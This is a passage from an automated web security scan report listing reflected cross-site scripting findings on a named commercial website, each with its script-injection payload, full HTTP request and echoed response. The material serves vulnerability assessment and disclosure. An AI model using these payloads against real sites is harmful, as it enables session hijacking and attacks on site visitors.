Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:03:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141432"
Content-Type: text/html; charset=utf-8
Content-Length: 20211
Date: Sun, 04 Sep 2011 13:04:06 GMT
X-Varnish: 1163117703
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2?995fa"><script>alert(1)</script>7517b2c51a6=1" />
...[SNIP]...

1.89. http://usa.kaspersky.com/node/12354/lightbox2 [pure-pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of the pure-pp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f70"><script>alert(1)</script>83f6663b944a6dc68 was submitted in the pure-pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /node/12354/lightbox2?pure-pp=13f70"><script>alert(1)</script>83f6663b944a6dc68&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:48:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140520"
Content-Type: text/html; charset=utf-8
Content-Length: 20230
Date: Sun, 04 Sep 2011 12:48:47 GMT
X-Varnish: 1163090940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox2?pure-pp=13f70"><script>alert(1)</script>83f6663b944a6dc68&x=0&y=0" />
...[SNIP]...

1.90. http://usa.kaspersky.com/node/17007 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d2f"><script>alert(1)</script>c7577d70262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node26d2f"><script>alert(1)</script>c7577d70262/17007 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141066"
Content-Type: text/html; charset=utf-8
Content-Length: 30654
Date: Sun, 04 Sep 2011 12:58:19 GMT
X-Varnish: 1163107146
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node26d2f"><script>alert(1)</script>c7577d70262/17007" />
...[SNIP]...

1.91. http://usa.kaspersky.com/node/17007 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2acfe"-alert(1)-"72f5f76d863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node2acfe"-alert(1)-"72f5f76d863/17007 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:58:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141132"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 12:59:03 GMT
X-Varnish: 1163109057
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node2acfe"-alert(1)-"72f5f76d863/17007";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.92. http://usa.kaspersky.com/node/17007 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef28f"-alert(1)-"9c47b60f00f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/17007ef28f"-alert(1)-"9c47b60f00f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141259"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 13:01:11 GMT
X-Varnish: 1163112847
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/17007ef28f"-alert(1)-"9c47b60f00f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.93. http://usa.kaspersky.com/node/17007 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af2"><script>alert(1)</script>22e36934d59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/1700758af2"><script>alert(1)</script>22e36934d59 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:08 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141208"
Content-Type: text/html; charset=utf-8
Content-Length: 29889
Date: Sun, 04 Sep 2011 13:00:27 GMT
X-Varnish: 1163111673
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/1700758af2"><script>alert(1)</script>22e36934d59" />
...[SNIP]...

1.94. http://usa.kaspersky.com/node/17007 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ff"><script>alert(1)</script>359df1f9655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/17007?6a3ff"><script>alert(1)</script>359df1f9655=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:53:25 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140805"
Content-Type: text/html; charset=utf-8
Content-Length: 36832
Date: Sun, 04 Sep 2011 12:53:34 GMT
X-Varnish: 1163099614
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/17007?6a3ff"><script>alert(1)</script>359df1f9655=1" />
...[SNIP]...

1.95. http://usa.kaspersky.com/node/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8802f"-alert(1)-"54076cce41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node8802f"-alert(1)-"54076cce41c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145420"
Content-Type: text/html; charset=utf-8
Content-Length: 30572
Date: Sun, 04 Sep 2011 14:10:34 GMT
X-Varnish: 1163255162
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node8802f"-alert(1)-"54076cce41c/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.96. http://usa.kaspersky.com/node/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab898"><script>alert(1)</script>b8234a2510c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodeab898"><script>alert(1)</script>b8234a2510c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145379"
Content-Type: text/html; charset=utf-8
Content-Length: 32139
Date: Sun, 04 Sep 2011 14:09:49 GMT
X-Varnish: 1163253944
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodeab898"><script>alert(1)</script>b8234a2510c/index.html" />
...[SNIP]...

1.97. http://usa.kaspersky.com/node/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936f7"-alert(1)-"cd3a31c3f38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/index.html936f7"-alert(1)-"cd3a31c3f38 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:41 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145501"
Content-Type: text/html; charset=utf-8
Content-Length: 30587
Date: Sun, 04 Sep 2011 14:11:52 GMT
X-Varnish: 1163258141
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/index.html936f7"-alert(1)-"cd3a31c3f38";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.98. http://usa.kaspersky.com/node/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fcf"><script>alert(1)</script>ee3eca5136f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:15 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145475"
Content-Type: text/html; charset=utf-8
Content-Length: 29919
Date: Sun, 04 Sep 2011 14:11:23 GMT
X-Varnish: 1163257168
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f" />
...[SNIP]...

1.99. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a6a"-alert(1)-"474c2192743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /node/index.html?74a6a"-alert(1)-"474c2192743=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145256"
Content-Type: text/html; charset=utf-8
Content-Length: 30570
Date: Sun, 04 Sep 2011 14:07:42 GMT
X-Varnish: 1163248782
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/index.html?74a6a"-alert(1)-"474c2192743=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.100. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebdb9"><script>alert(1)</script>512ff95029d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145204"
Content-Type: text/html; charset=utf-8
Content-Length: 30651
Date: Sun, 04 Sep 2011 14:06:56 GMT
X-Varnish: 1163247096
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1" />
...[SNIP]...

1.101. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1927f"><script>alert(1)</script>4da6a2e3d63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:04 +0000
